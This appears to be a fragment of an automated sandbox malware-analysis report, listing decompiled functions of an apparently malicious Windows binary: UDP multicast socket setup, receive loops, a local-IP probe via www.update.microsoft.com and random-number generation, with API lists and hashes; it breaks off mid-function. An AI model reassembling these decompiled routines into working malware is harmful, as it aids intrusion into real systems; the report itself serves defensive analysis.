                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                                    • Opcode ID: 3abddafc972960b7a34b09499d5804bac4f0b45d7085fcd8f09acaffb4ecffc4
                                                                                                                                                                                                                                                                                    • Instruction ID: 76d768ee63a1ab765bf53bd3b80837b0909e15b9bb20e5c949896882321ca4fe
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abddafc972960b7a34b09499d5804bac4f0b45d7085fcd8f09acaffb4ecffc4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C4106B4E00208EBDB14DFE4D889BEEBBB5AF48304F108569E505B7290E7B55A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                                                                                                                                    			E0040D8A0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                                    				short _v8;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v33;
                                                                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				short _t24;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t39 = __esi;
                                                                                                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                                                                                                    				if(__esi == 0 || __edi == 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t31 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    					 *_t31 = 0x756470;
                                                                                                                                                                                                                                                                                    					 *(_t31 + 4) = 0;
                                                                                                                                                                                                                                                                                    					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t31 + 0x10) = _t21;
                                                                                                                                                                                                                                                                                    					__imp__#23(2, 2, 0x11, _t30);
                                                                                                                                                                                                                                                                                    					 *(_t31 + 8) = _t21;
                                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t31, __edi);
                                                                                                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						return _t31;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_t24 = _v8;
                                                                                                                                                                                                                                                                                    					_v24 = _t24;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t39);
                                                                                                                                                                                                                                                                                    					_v30 = _t24;
                                                                                                                                                                                                                                                                                    					_v33 = 1;
                                                                                                                                                                                                                                                                                    					_t25 =  *(_t31 + 8);
                                                                                                                                                                                                                                                                                    					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DAD0, _t31, 0, 0);
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040DD00(_t31, _t38);
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a0
                                                                                                                                                                                                                                                                                    0x0040d8a8
                                                                                                                                                                                                                                                                                    0x0040d994
                                                                                                                                                                                                                                                                                    0x0040d8b6
                                                                                                                                                                                                                                                                                    0x0040d8c5
                                                                                                                                                                                                                                                                                    0x0040d8cb
                                                                                                                                                                                                                                                                                    0x0040d8d1
                                                                                                                                                                                                                                                                                    0x0040d8d8
                                                                                                                                                                                                                                                                                    0x0040d8e4
                                                                                                                                                                                                                                                                                    0x0040d8e7
                                                                                                                                                                                                                                                                                    0x0040d8ed
                                                                                                                                                                                                                                                                                    0x0040d8f3
                                                                                                                                                                                                                                                                                    0x0040d8f5
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fa
                                                                                                                                                                                                                                                                                    0x0040d8fe
                                                                                                                                                                                                                                                                                    0x0040d98e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d990
                                                                                                                                                                                                                                                                                    0x0040d906
                                                                                                                                                                                                                                                                                    0x0040d90a
                                                                                                                                                                                                                                                                                    0x0040d90e
                                                                                                                                                                                                                                                                                    0x0040d912
                                                                                                                                                                                                                                                                                    0x0040d917
                                                                                                                                                                                                                                                                                    0x0040d921
                                                                                                                                                                                                                                                                                    0x0040d925
                                                                                                                                                                                                                                                                                    0x0040d92a
                                                                                                                                                                                                                                                                                    0x0040d939
                                                                                                                                                                                                                                                                                    0x0040d93e
                                                                                                                                                                                                                                                                                    0x0040d943
                                                                                                                                                                                                                                                                                    0x0040d94c
                                                                                                                                                                                                                                                                                    0x0040d95d
                                                                                                                                                                                                                                                                                    0x0040d966
                                                                                                                                                                                                                                                                                    0x0040d982
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d98b
                                                                                                                                                                                                                                                                                    0x0040d968
                                                                                                                                                                                                                                                                                    0x0040d973
                                                                                                                                                                                                                                                                                    0x0040d973

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040D8D8
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D8E7
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00009E34), ref: 0040D92A
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040D94C
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040D95D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040DAD0,00000000,00000000,00000000), ref: 0040D985
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 05ebf89ae4aef0f9de86e26819af3cc3888251010e7b9e55e68cfc395c831c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 030b81ab5cfdece744e4193ec97e607ba68bdf4ca273294f478105adee985cb3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ebf89ae4aef0f9de86e26819af3cc3888251010e7b9e55e68cfc395c831c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721A1B4A44301AFE710DFA48C8AB577AA0EF44710F50857AFA54DA2C1D7F4C9488B6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040B540(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _a16;
                                                                                                                                                                                                                                                                                    				if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = GetTickCount() + _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _a8;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					_t38 = _a4;
                                                                                                                                                                                                                                                                                    					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                                                                                                                                                                                                                    					if(_t38 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_v16 > 0) {
                                                                                                                                                                                                                                                                                    						if(_v16 >= _a12) {
                                                                                                                                                                                                                                                                                    							_v24 = _a12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = _v16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t43 = _a4;
                                                                                                                                                                                                                                                                                    						__imp__#16(_t43, _v8, _v24, 0);
                                                                                                                                                                                                                                                                                    						_v20 = _t43;
                                                                                                                                                                                                                                                                                    						if(_v20 > 0) {
                                                                                                                                                                                                                                                                                    							if(_a16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_v12 = GetTickCount() + _a16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_a12 = _a12 - _v20;
                                                                                                                                                                                                                                                                                    							_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(1);
                                                                                                                                                                                                                                                                                    					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						return 0 | _a12 == 0x00000000;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040b549
                                                                                                                                                                                                                                                                                    0x0040b550
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b55b
                                                                                                                                                                                                                                                                                    0x0040b561
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b564
                                                                                                                                                                                                                                                                                    0x0040b574
                                                                                                                                                                                                                                                                                    0x0040b578
                                                                                                                                                                                                                                                                                    0x0040b581
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b589
                                                                                                                                                                                                                                                                                    0x0040b591
                                                                                                                                                                                                                                                                                    0x0040b59e
                                                                                                                                                                                                                                                                                    0x0040b593
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b596
                                                                                                                                                                                                                                                                                    0x0040b5ab
                                                                                                                                                                                                                                                                                    0x0040b5af
                                                                                                                                                                                                                                                                                    0x0040b5b5
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5c2
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5cd
                                                                                                                                                                                                                                                                                    0x0040b5d6
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5df
                                                                                                                                                                                                                                                                                    0x0040b5bc
                                                                                                                                                                                                                                                                                    0x0040b5e4
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x0040b5ff
                                                                                                                                                                                                                                                                                    0x0040b60b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040b5f3
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B552
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B578
                                                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B5AF
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5C4
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040B5E4
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040B5EA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction ID: 64461f39ab81653a4184227da93eab0719a9ebb5afb4910718686698f9d98f64
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbc88ac5e59e45bbdcf572904d8cc1d56ccf512b654b7b3376d83b26deadee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7131EF74900209EFCB14DFA4DD48AEE7BB5FF48315F1086AAE825A3290D7749A50CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                                                                                                                                                    			E00409540() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                                                    				short _v38;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				short _v42;
                                                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_v18 = 0;
                                                                                                                                                                                                                                                                                    				_v14 = 0;
                                                                                                                                                                                                                                                                                    				_v10 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 2;
                                                                                                                                                                                                                                                                                    				__imp__#9(0x50);
                                                                                                                                                                                                                                                                                    				_v22 = 0;
                                                                                                                                                                                                                                                                                    				_t28 = E00409500("www.update.microsoft.com");
                                                                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 1, 0);
                                                                                                                                                                                                                                                                                    				_v28 = _t28;
                                                                                                                                                                                                                                                                                    				if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t30 =  &_v24;
                                                                                                                                                                                                                                                                                    					__imp__#4(_v28, _t30, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    						_v44 = 0;
                                                                                                                                                                                                                                                                                    						_v42 = 0;
                                                                                                                                                                                                                                                                                    						_v38 = 0;
                                                                                                                                                                                                                                                                                    						_v34 = 0;
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v48 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                                                                                                                                                                                                                    						_v8 = _v40;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00409600(_v28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    0x00409546
                                                                                                                                                                                                                                                                                    0x0040954f
                                                                                                                                                                                                                                                                                    0x00409555
                                                                                                                                                                                                                                                                                    0x00409558
                                                                                                                                                                                                                                                                                    0x0040955b
                                                                                                                                                                                                                                                                                    0x0040955e
                                                                                                                                                                                                                                                                                    0x00409567
                                                                                                                                                                                                                                                                                    0x0040956d
                                                                                                                                                                                                                                                                                    0x00409573
                                                                                                                                                                                                                                                                                    0x0040957c
                                                                                                                                                                                                                                                                                    0x00409584
                                                                                                                                                                                                                                                                                    0x0040958d
                                                                                                                                                                                                                                                                                    0x00409593
                                                                                                                                                                                                                                                                                    0x0040959a
                                                                                                                                                                                                                                                                                    0x0040959e
                                                                                                                                                                                                                                                                                    0x004095a6
                                                                                                                                                                                                                                                                                    0x004095ae
                                                                                                                                                                                                                                                                                    0x004095b2
                                                                                                                                                                                                                                                                                    0x004095b8
                                                                                                                                                                                                                                                                                    0x004095bb
                                                                                                                                                                                                                                                                                    0x004095be
                                                                                                                                                                                                                                                                                    0x004095c1
                                                                                                                                                                                                                                                                                    0x004095c5
                                                                                                                                                                                                                                                                                    0x004095d8
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e1
                                                                                                                                                                                                                                                                                    0x004095e8
                                                                                                                                                                                                                                                                                    0x004095ed
                                                                                                                                                                                                                                                                                    0x004095f6

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: inet_addr.WS2_32(00409581), ref: 0040950A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409500: gethostbyname.WS2_32(?), ref: 0040951D
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 00409577
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dec295092395f23a9cc8e75f3d945b5eddd047bf9da38ba452b3522f7f48efc
                                                                                                                                                                                                                                                                                    • Instruction ID: 389a469d72f566baadd69971dc4dec0fd14d74987819c9d890e36e211f91e18c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dec295092395f23a9cc8e75f3d945b5eddd047bf9da38ba452b3522f7f48efc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD210EB5D14309ABCB04DFE4D846AEFBBB4AF48310F108169E505F3390E7745A44CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E0040A870(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    				_t6 = _t1;
                                                                                                                                                                                                                                                                                    				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                                                                    					_t4 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                                    					_t5 =  &_v8; // 0x406545
                                                                                                                                                                                                                                                                                    					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t6;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a87f
                                                                                                                                                                                                                                                                                    0x0040a883
                                                                                                                                                                                                                                                                                    0x0040a88b
                                                                                                                                                                                                                                                                                    0x0040a895
                                                                                                                                                                                                                                                                                    0x0040a899
                                                                                                                                                                                                                                                                                    0x0040a8a1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040a8a5
                                                                                                                                                                                                                                                                                    0x0040a8ae

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Ee@,00000000,00000000,00000001,F0000040,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A883
                                                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Ee@,?,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A899
                                                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Ee@,00000000,?,?,0040A8C9,Ee@,00000004,?,?,0040A8FE,000000FF), ref: 0040A8A5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                    • String ID: Ee@
                                                                                                                                                                                                                                                                                    • API String ID: 1815803762-3880142923
                                                                                                                                                                                                                                                                                    • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction ID: 1edff0947e8a0bec857b7d5bc171d56b6abde249d8757a471d495e886690916f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47E01275650308FBDB14DBD1EC49F9A777CAB48740F108154B709A7284DAB5EA408768
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 22%
                                                                                                                                                                                                                                                                                    			E0040DD70(void* __edi) {
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t27 = __edi;
                                                                                                                                                                                                                                                                                    				_t24 = E00408B00(0x24);
                                                                                                                                                                                                                                                                                    				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                                    				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                                    				_t15 = CreateEventA(0, 1, 0, 0);
